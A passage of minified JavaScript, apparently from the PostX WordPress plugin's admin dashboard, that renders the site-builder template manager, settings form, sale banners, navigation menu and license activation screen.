ultp-dashboverlay",href:o,target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))))},re=()=>"all"!=g&&"archive"!=g?(N(g),v(g),void((Z.length<=0||"front_page"==g&&U.length<=0)&&J())):(0,r.createElement)("div",{className:"ultp-builder-items"},("all"==g?["front_page",...d]:"archive"==g?d.filter((e=>"singular"!=e)):[g]).map(((e,n)=>(0,r.createElement)("div",{key:n,onClick:()=>{N(e),v(e),(Z.length<=0||"front_page"==e&&U.length<=0)&&J()}},(0,r.createElement)("div",{className:"newScreen ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"ultp_h6"},e)),(0,r.createElement)("div",{className:"listOverlays"},(0,r.createElement)("img",{src:t.url+`addons/builder/assets/icons/template/${e.toLowerCase()}.svg`}),(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"}),__("Add","ultimate-post")," ",e)))))));return(0,r.createElement)("div",{className:"ultp-builder-dashboard"},K.state&&(0,r.createElement)(l.Z,{delay:2e3,toastMessages:K,setToastMessages:X}),!n&&(0,r.createElement)("div",{className:"ultp-builder-dashboard__content ultp-builder-tab"},(0,r.createElement)("div",{className:"ultp-builder-tab__option"},(0,r.createElement)("span",{onClick:()=>(M(!0),void wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(ee(),M(!1),X({status:"success",messages:[e.message],state:!0}))}))),className:"ultp-popup-sync"},(0,r.createElement)("i",{className:"dashicons dashicons-update-alt"+(S?" rotate":"")}),__("Synchronize","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"all"==g&&{className:"active"},{onClick:()=>{v("all"),w(!1),N("")}}),(0,r.createElement)("span",{className:"dashicons dashicons-admin-home"})," ",__("All Template","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"front_page"==g&&{className:"active"},{onClick:()=>{v("front_page"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/front_page.svg"}),__("Front Page","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"singular"==g&&{className:"active"},{onClick:()=>{v("singular"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/singular.svg"}),__("Singular","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"search"==g&&{className:"active"},{onClick:()=>{v("search"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/search.svg"}),__("Search Result","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"archive"==g&&{className:"active"},{onClick:()=>{v("archive"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/archive.svg"}),__("Archive","ultimate-post")),(0,r.createElement)("ul",null,(0,r.createElement)("li",(0,a.Z)({},"category"==g&&{className:"active"},{onClick:()=>{v("category"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/category.svg"}),__("Category","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"author"==g&&{className:"active"},{onClick:()=>{v("author"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/author.svg"}),__("Authors","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"post_tag"==g&&{className:"active"},{onClick:()=>{v("post_tag"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/tag.svg"}),__("Tags","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"date"==g&&{className:"active"},{onClick:()=>{v("date"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/date.svg"}),__("Date","ultimate-post"))),(0,r.createElement)("li",(0,a.Z)({},"header"==g&&{className:"active"},{onClick:()=>{v("header"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/header.svg"}),__("Header","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"footer"==g&&{className:"active"},{onClick:()=>{v("footer"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/footer.svg"}),__("Footer","ultimate-post")),(0,r.createElement)("li",(0,a.Z)({},"404"==g&&{className:"active"},{onClick:()=>{v("404"),w(!1),N("")}}),(0,r.createElement)("img",{src:t.url+"addons/builder/assets/icons/menu/404.svg"}),"404"))),(0,r.createElement)("div",{className:"ultp-builder-tab__content ultp-builder-tab__template"},(0,r.createElement)("div",{className:"ultp-builder-tab__heading"},(0,r.createElement)("div",{className:"ultp-builder-heading__title"},(""!=L||_)&&G&&(0,r.createElement)("span",{onClick:()=>{q(!1),w(!1),N("")}}," ",i.ZP.leftAngle2,__("Back","ultimate-post")),(0,r.createElement)("div",{className:"ultp_h5 heading"},__("All","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Templates","ultimate-post"))),f.length>0&&""==L&&!_?(0,r.createElement)("button",{className:"cursor ultp-primary-button ultp-builder-create-btn",onClick:()=>{w(!0),q(!0),N("all"==g||"archive"==g?"":g)}}," ","+ ",__("Create","ultimate-post")," ","all"==g?"":g.replace("_"," ")," ",__("Template","ultimate-post")):O?"":(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:170,unit1:"px",size2:42,unit2:"px",br:4}})),(0,r.createElement)("div",{className:"ultp-tab__content active"},O?""==L?((e="all")=>{let t=0;return(0,r.createElement)("div",{className:"ultp-template-list__tab"},0==_&&f.length>0?f.map(((n,a)=>{const o=((e,t)=>{let n=[];return e?.id&&void 0!==b[e?.type]&&b[e.type][e.id]?.map(((e,t)=>{e&&(n=e.split("/"))})),n})(n);if("all"==e||e==n.type||e==o[2]&&n.type==o[1]&&!["header","footer"].includes(n.type))return t++,(0,r.createElement)("div",{key:a,className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)("div",{className:"ultp-template-list__meta"},(0,r.createElement)("div",null,(0,r.createElement)("span",null,"front_page"==n.type?"Front Page":n.type," ",":")," ",n.title," ",(0,r.createElement)("span",null,"ID :")," #",n.id),n.id&&void 0!==b[n.type]&&(0,r.createElement)("div",{className:"ultp-condition__previews"},"(",(b[n.type][n.id]||[]).map(((e,t)=>{if(e){const n=e.split("/");return(0,r.createElement)(r.Fragment,{key:t},0==t?"":", ",(0,r.createElement)("span",null,void 0!==n[2]?n[2]:n[1]))}})),")")),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},"front_page"!=n.type&&"404"!=n.type&&(0,r.createElement)("button",{onClick:()=>{m(n.type),k(n.id)},className:"ultp-condition__edit"},__("Conditions","ultimate-post")),(0,r.createElement)("a",{className:"status"}," ","publish"==n.status?"Published":n.status),(0,r.createElement)("a",{href:n?.edit?.replaceAll("&amp;","&"),className:"ultp-condition-action",target:"_blank",rel:"noreferrer"},(0,r.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to duplicate this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"duplicate",section:"builder"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-admin-page"}),__("Duplicate","ultimate-post")),(0,r.createElement)("a",{className:"ultp-condition-action ultp-single-popup__btn cursor",onClick:e=>{e.preventDefault(),confirm("Are you sure you want to delete this template?")&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"delete",section:"builder"}}).then((e=>{e.success&&(h(f.filter((e=>e.id!=n.id))),X({status:"error",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-trash"}),__("Delete","ultimate-post")),(0,r.createElement)("span",{onClick:e=>{D(!W),F(n.id)}},(0,r.createElement)("span",{className:"dashicons dashicons-ellipsis ultp-builder-dashboard__action ultp-reserve-button"})),V==n.id&&W&&(0,r.createElement)("span",{className:"ultp-builder-action__active ultp-reserve-button",onClick:e=>{F(""),D(!1),e.preventDefault(),confirm(`Are you sure you want to ${"publish"==n.status?"draft":"publish"} this template?`)&&wp.apiFetch({path:"/ultp/v2/template_action",method:"POST",data:{id:n.id,type:"status",status:"publish"==n.status?"draft":"publish"}}).then((e=>{e.success&&(ee(),X({status:"success",messages:[e.message],state:!0}))}))}},(0,r.createElement)("span",{className:"dashicons dashicons-open-folder ultp-reserve-button"})," ",__("Set to","ultimate-post")," ","publish"==n.status?__("Draft","ultimate-post"):__("Publish","ultimate-post")))))})):re(),0==_&&f.length>0&&!t&&re())})(g):(0,r.createElement)("div",{className:`premadeScreen ${L&&" ultp-builder-items ultp"+L}`},(0,r.createElement)("div",{className:"ultp-list-blank-img ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"ultp-item-list-overlay ultp-p20 ultp-premade-img__blank"},(0,r.createElement)("img",{src:t.url+"assets/img/dashboard/start-scratch.svg"}),(0,r.createElement)("a",{className:"cursor",onClick:e=>{e.preventDefault(),te()}},(0,r.createElement)("span",{className:"ultp-list-white-overlay"},(0,r.createElement)("span",{className:"dashicons dashicons-plus-alt"})," ",__("Start from Scratch","ultimate-post")," ")))),"front_page"==L?U.map(((e,t)=>ae(e,t))):Z.map(((e,t)=>{if("archive"!=e.builder_type&&e.builder_type==L||"archive"==e.builder_type&&(e.archive_type==L||"archive"==L))return ae(e,t)}))):(0,r.createElement)("div",{className:"skeletonOverflow",label:__("Loading…","ultimate-post")},Array(6).fill(1).map(((e,t)=>(0,r.createElement)("div",{key:t,className:"ultp-template-list__tab",style:{marginBottom:"15px"}},(0,r.createElement)("div",{className:"ultp-template-list__wrapper"},(0,r.createElement)("div",{className:"ultp-template-list__heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"%",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-template-list__control ultp-template-list__content"},(2==t||4==t)&&(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:56,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:25,unit1:"px",size2:12,unit2:"px",br:2}}))))))))))),y&&(0,r.createElement)("div",{className:"ultp-condition-wrapper ultp-condition--active"},(0,r.createElement)("div",{className:"ultp-condition-popup ultp-popup-wrap"},(0,r.createElement)("button",{className:"ultp-save-close",onClick:()=>k("")},i.ZP.close_line),Object.keys(E).length&&u?(0,r.createElement)(c.Z,{type:u,id:"yes"==y?I:y,settings:b,defaults:E,setShowCondition:"yes"==n?k:""}):(0,r.createElement)("div",{className:"ultp-modal-content"},(0,r.createElement)("div",{className:"ultp-condition-wrap"},(0,r.createElement)("div",{className:"ultp_h3 ultp-condition-wrap-heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:330,unit1:"px",size2:22,unit2:"px",br:2}})),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:460,unit1:"px",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-condition-items"},(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}}))))))),B&&(0,s.cs)({tags:"builder_popup",func:e=>{H(e)},data:{icon:"template_lock.svg",title:__("Create Unlimited Templates With PostX Pro","ultimate-post"),description:__("We are sorry. Unfortunately, the free version of PostX lets you create only one template. Please upgrade to a pro version that unlocks the full capabilities of the dynamic site builder.","ultimate-post")}}))}},3944:(e,t,n)=>{"use strict";n.d(t,{Z:()=>p});var a=n(7294),r=n(1383),o=n(4766),i=n(4482),l=n(8949),s=n(356);n(8350);const{__}=wp.i18n,p=()=>{const[e,t]=(0,a.useState)({}),[n,p]=(0,a.useState)({state:!1,status:""}),[c,d]=(0,a.useState)(!1);(0,a.useEffect)((()=>{m()}),[]);const u=(0,r.t)(),m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&t(e.settings)}))};return(0,a.createElement)("div",{className:"ultp-dashboard-general-settings-container"},(0,a.createElement)("div",{className:"ultp-general-settings ultp-dash-item-con"},(0,a.createElement)("div",null,n.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:n,setToastMessages:p}),(0,a.createElement)("div",{className:"ultp_h5 heading"},__("General Settings","ultimate-post")),Object.keys(e).length>0?(0,a.createElement)("form",{onSubmit:e=>{d(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{e.success&&p({status:"success",messages:[e.message],state:!0}),d(!1)}))},action:""},(0,i.DC)(i.u4,e),(0,a.createElement)("div",{className:"ultp-data-message"}),(0,a.createElement)("div",null,(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(c?"onloading":"")},__("Save Settings","ultimate-post"),c&&o.ZP.refresh))):(0,a.createElement)("div",{className:"skeletonOverflow"},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:150,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:"",unit1:"",size2:34,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:350,unit1:"px",size2:20,unit2:"px",br:2}})))),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:120,unit1:"px",size2:36,unit2:"px",br:2}})))),(0,a.createElement)("div",{className:"ultp-general-settings-content-right"},(0,a.createElement)(i.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"})))}},3546:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(2044);n(8009);const{__}=wp.i18n,o=()=>{const[e,t]=(0,a.useState)(ultp_dashboard_pannel.helloBar);if(new Date>=new Date("2025-06-23")&&(new Date,new Date("2025-07-09")),"hide"===e||ultp_dashboard_pannel.active)return null;const n=[{title:__("Final Hour Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"final_hour_sale",startDate:new Date("2025-08-04"),endDate:new Date("2025-08-14")},{title:__("Massive Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"massive_sale",startDate:new Date("2025-08-18"),endDate:new Date("2025-08-29")},{title:__("Flash Sale is live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"flash_sale",startDate:new Date("2025-09-01"),endDate:new Date("2025-09-17")},{title:__("Exclusive Deals Live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"exclusive_deals",startDate:new Date("2025-09-21"),endDate:new Date("2025-09-30")},{title:__("Booming Black Friday Deals:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 60% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"black_friday_sale",startDate:new Date("2025-11-05"),endDate:new Date("2025-12-10")},{title:__("Fresh New Year Savings:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 55% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"new_year_sale",startDate:new Date("2026-01-01"),endDate:new Date("2026-02-15")}].find((e=>{const t=new Date;return t>=e.startDate&&t<=e.endDate}));let o=0;if(n){const e=new Date;o=Math.floor((n?.endDate-e)/1e3)}return(0,a.createElement)("div",null,n&&(0,a.createElement)("div",{className:"ultp-setting-hellobar"},(0,a.createElement)("span",{className:"dashicons dashicons-bell ultp-ring"}),n.title," ",n.subtitle," ",(0,a.createElement)("strong",null,n.offer)," ",n.product," ",(0,a.createElement)("a",{href:(0,r.Z)({utmKey:n.utmKey,hash:"pricing"}),target:"_blank",rel:"noreferrer"},n.link_text,"   ➤"),(0,a.createElement)("button",{type:"button",className:"helobarClose",onClick:()=>{return e=o,t("hide"),void wp.apiFetch({path:"/ultp/hello_bar",method:"POST",data:{type:"hello_bar",duration:e}});var e},"aria-label":__("Close notification","ultimate-post"),style:{background:"none",border:"none",padding:0,cursor:"pointer"}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 20 20"},(0,a.createElement)("path",{stroke:"currentColor",d:"M15 5 5 15M5 5l10 10"})))))}},1383:(e,t,n)=>{"use strict";n.d(t,{t:()=>_});var a=n(7294),r=n(3935),o=n(3100),i=n(4766),l=n(860),s=n(7191),p=n(8351),c=n(3644),d=(n(9780),n(3944)),u=n(3546),m=(n(2156),n(2470)),f=n(3701),h=n(5957),g=n(3554),v=n(58);const{__}=wp.i18n;function _(){const e=(0,a.useRef)(!1);return(0,a.useEffect)((()=>(e.current=!0,()=>e.current=!1)),[]),e}document.body.contains(document.getElementById("ultp-dashboard"))&&r.render((0,a.createElement)(a.StrictMode,null,(0,a.createElement)((()=>{const[e,t]=(0,a.useState)("xx"),[n,r]=(ultp_dashboard_pannel.status,ultp_dashboard_pannel.expire,(0,a.useState)(!1)),_=[{link:"#home",label:__("Dashboard","ultimate-post"),showin:"both"},{link:"#startersites",label:__("Starter Sites","ultimate-post"),showin:"both",tag:"New"},{link:"#builder",label:__("Site Builder","ultimate-post"),showin:ultp_dashboard_pannel.settings.hasOwnProperty("ultp_builder")&&"false"!=ultp_dashboard_pannel.settings.ultp_builder?"both":"none",showhide:!0},{link:"#blocks",label:__("Blocks","ultimate-post"),showin:"both"},{link:"#addons",label:__("Add-ons","ultimate-post"),showin:"both"},{link:"#settings",label:__("Settings","ultimate-post"),showin:"both"}],w=[{label:__("Get Support","ultimate-post"),icon:"dashicons-phone",link:"https://www.wpxpo.com/contact/?utm_source=postx-menu&utm_medium=all_que-support&utm_campaign=postx-dashboard"},{label:__("Welcome Guide","ultimate-post"),icon:"dashicons-megaphone",link:ultp_dashboard_pannel.setup_wizard_link},{label:__("Join Community","ultimate-post"),icon:"dashicons-facebook-alt",link:"https://www.facebook.com/groups/gutenbergpostx"},{label:__("Feature Request","ultimate-post"),icon:"dashicons-email-alt",link:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=all_que-FR&utm_campaign=postx-dashboard"},{label:__("Youtube Tutorials","ultimate-post"),icon:"dashicons-youtube",link:"https://www.youtube.com/watch?v=_GfXTvSdJTk&list=PLPidnGLSR4qcAwVwIjMo1OVaqXqjUp_s4"},{label:__("Documentation","ultimate-post"),icon:"dashicons-book",link:"https://wpxpo.com/docs/postx/?utm_source=postx-menu&utm_medium=all_que-docs&utm_campaign=postx-dashboard"},{label:__("What’s New","ultimate-post"),icon:"dashicons-edit",link:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=all_que-roadmap&utm_campaign=postx-dashboard"}],b=e=>{if(e.target&&!e.target.classList?.contains("ultp-reserve-button")&&e.target.href&&e.target.href.indexOf("page=ultp-settings#")>0){const n=e.target.href.split("#");n[1]&&(t(n[1]),window.scrollTo({top:0,behavior:"smooth"}))}e.target.closest(".dash-faq-container")||e.target.classList?.contains("ultp-reserve-button")||r(!1)},[x,y]=(0,a.useState)(window.location.hash||e);(0,a.useEffect)((()=>{const e=()=>{y(window.location.hash||"#welcome")};return window.location.hash||(window.location.hash=_[0].link.replace("#","")),window.addEventListener("hashchange",e),()=>{window.removeEventListener("hashchange",e)}}),[]),(0,a.useEffect)((()=>{const n=x.replace("#","");n&&n!==e&&t(n)}),[x,e]),(0,a.useEffect)((()=>((()=>{let e=window.location.href;e.includes("page=ultp-settings#")&&(e=e.split("page=ultp-settings#"),e[1]&&t(e[1]))})(),document.addEventListener("mousedown",b),()=>document.removeEventListener("mousedown",b))),[]);const[k,E]=(0,a.useState)({success:!1,license:"invalid"});return(0,a.createElement)("div",{className:"ultp-menu-items-wrap"},(0,a.createElement)(u.Z,null),(0,a.createElement)("div",{className:"ultp-setting-header"},(0,a.createElement)("div",{className:"ultp-setting-logo"},(0,a.createElement)("img",{className:"ultp-setting-header-img",loading:"lazy",src:ultp_dashboard_pannel.url+"/assets/img/logo-new.png",alt:"PostX"}),(0,a.createElement)("span",{className:"ultp-setting-version"},ultp_dashboard_pannel.version)),(0,a.createElement)("div",{className:"ultp-menu-items",id:"ultp-dashboard-ultp-menu-items"},_.map(((t,n)=>"both"==t.showin||"menu"==t.showin||t.showhide?(0,a.createElement)("a",{href:t.link,style:{display:"none"==t.showin?"none":""},id:"ultp-dasnav-"+t.link.replace("#",""),key:n,className:(t.link=="#"+e?"current":"")+" ultp-menu-item",onClick:()=>y(t.link.replace("#",""))},t.label,t.tag&&(0,a.createElement)("span",{className:"ultp-menu-item-tag"},t.tag)):""))),(0,a.createElement)("div",{className:"ultp-secondary-menu"},(0,a.createElement)("a",{href:"#plugins",className:"ultp-menu-item "+(["plugins","#plugins"].includes(x)?"current":""),onClick:()=>y("plugins")},i.ZP.connect,__("Our Plugins","ultimate-post")),!ultp_dashboard_pannel?.active&&(0,a.createElement)("a",{href:(0,o.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),className:"ultp-secondary-button ultp-pro-button"},__("Upgrade Pro","ultimate-post"),i.ZP.unlock)),(0,a.createElement)("div",{className:"ultp-dash-faq-con"},(0,a.createElement)("span",{onClick:()=>r(!n),className:"ultp-dash-faq-icon ultp-reserve-button dashicons dashicons-editor-help"}),n&&(0,a.createElement)("div",{className:"dash-faq-container"},w.map(((e,t)=>(0,a.createElement)("a",{key:t,href:e.link,target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:`dashicons ${e.icon}`}),e.label)))))),(0,a.createElement)("div",{className:"ultp-settings-container "+("startersites"==e?"ultp-settings-container-startersites":"")},(0,a.createElement)("ul",{className:"ultp-settings-content"},(0,a.createElement)("li",{className:"current"},"xx"!=e&&("home"==e||!["builder","startersites","integrations","saved-templates","custom-font","addons","blocks","settings","tutorials","license","support","plugins"].includes(e))&&(0,a.createElement)(c.Z,null),"saved-templates"==e&&(0,a.createElement)(h.Z,{type:"ultp_templates"}),"custom-font"==e&&(0,a.createElement)(h.Z,{type:"ultp_custom_font"}),"builder"==e&&(0,a.createElement)(p.Z,null),"startersites"==e&&(0,a.createElement)(g.Z,null),"addons"==e&&(0,a.createElement)(l.Z,{integrations:!0}),"blocks"==e&&(0,a.createElement)(s.Z,null),"settings"==e&&(0,a.createElement)(d.Z,null),"license"==e&&(0,a.createElement)(m.C,{licenseData:k,setLicenseData:E}),"support"==e&&(0,a.createElement)(v.Z,null),"plugins"==e&&(0,a.createElement)(f.I,null))),(0,a.createElement)(v.Z,null)),!ultp_dashboard_pannel.active&&(()=>{const e=(new Date).setHours(0,0,0,0)/1e3,t=345600,n=new Date("2024-05-21").setHours(0,0,0,0)/1e3,a=new Date("2024-07-22").setHours(0,0,0,0)/1e3;if(e<n||e>a)return!1;if(ultp_dashboard_pannel.settings.activated_date&&Number(ultp_dashboard_pannel.settings.activated_date)+t>=e)return!1;const r=Number(localStorage.getItem("ultpCouponDiscount"));return r?r<=e&&e<=r+t||e>=r+691200&&(localStorage.setItem("ultpCouponDiscount",String(e)),!0):(localStorage.setItem("ultpCouponDiscount",String(e)),!0)})()&&(0,a.createElement)("a",{className:"ultp-discount-wrap",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-discount&utm_medium=coupon&utm_campaign=postx-dashboard&pux_link=postxdbcoupon#pricing",target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:"ultp-discount-text"},__("Get Discount","ultimate-post"))))}),null)),document.getElementById("ultp-dashboard"))},2470:(e,t,n)=>{"use strict";n.d(t,{C:()=>o});var a=n(7294),r=(n(977),n(356));const{__}=wp.i18n,o=({licenseData:e,setLicenseData:t})=>{const[n,r]=(0,a.useState)(""),[o,l]=(0,a.useState)(!1),[s,p]=(0,a.useState)(!0);return(0,a.useEffect)((()=>{(async()=>{p(!0);const e=await(async()=>{try{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_get_license_data"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw l(!0),new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.success)return a.data}catch(e){return null}})();e?.license_data&&t(e?.license_data),p(!1)})()}),[]),(0,a.useEffect)((()=>{"valid"===e.license?ultp_dashboard_pannel.active=!0:ultp_dashboard_pannel.active=!1}),[e]),(0,a.createElement)("div",{className:"ultp-license"},s?(0,a.createElement)("div",{className:"ultp-license__activation",style:{display:"flex",flexDirection:"column",gap:"16px",paddingTop:"50px !important"}},(0,a.createElement)(c,{width:"250px",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px",style:{marginTop:"10px"}}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"})):(0,a.createElement)(i,{proUpdate:o,licenseKey:n,setLicenseKey:r,licenseData:e,setLicenseData:t}),(0,a.createElement)(u,null))},i=({proUpdate:e,licenseKey:t,setLicenseKey:n,licenseData:o,setLicenseData:i})=>{const[p,c]=(0,a.useState)(!1),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)({state:!1,status:"",messages:[]}),h=async()=>{try{c(!0);const e=await g(t);e?.status&&(i(e?.license_data),window.location.reload()),f({status:e.status?"success":"error",messages:[e?.data||"Some issues occured"],state:!0}),n(""),c(!1),u(!1)}catch(e){u(!0),f({status:"error",messages:["Some issues occured"],state:!0}),console.error("License Activation Error: ",e)}},g=async e=>{const t=`${ultp_dashboard_pannel.ajax}`,n=new URLSearchParams({action:"edd_ultp_activate_license",security:ultp_dashboard_pannel.nonce,license_key:e}),a=await fetch(t,{method:"POST",body:n,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!a.ok)throw new Error(`HTTP error! Status: ${a.status}`);return await a.json()};return(0,a.createElement)("div",{className:"ultp-license__activation"},(0,a.createElement)("div",{className:"ultp-license__title"},__(e?"Notice: Upgrade PostX Pro plugin":"Ready to Use PostX Pro ?","ultimate-post")),m.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:m,setToastMessages:f}),!e&&(0,a.createElement)(a.Fragment,null,"valid"!==o?.license?(0,a.createElement)("div",{className:"ultp-license__form"},(0,a.createElement)("input",{type:"password",id:"ultp-license-key",placeholder:__("Enter Your License Key Here…","ultimate-post"),value:t||"",onChange:e=>n(e.target.value)}),(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("If you’re unable to activate your product license, please contact the","ultimate-post")," ",(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>h(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&h()}},(0,a.createElement)("div",null,__("Activate License","ultimate-post")),p&&(0,a.createElement)("span",{className:"ultp-activate-loading"})),d&&(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("Please make sure your free and pro plugins are updated to the latest release or version. Otherwise, contact the","ultimate-post"),(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post")))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)(l,{title:__("Congratulations on unlocking PostX Pro!","ultimate-post"),message:__("Ignite your imagination and design your ideal experience. Let PostX take care of you and your 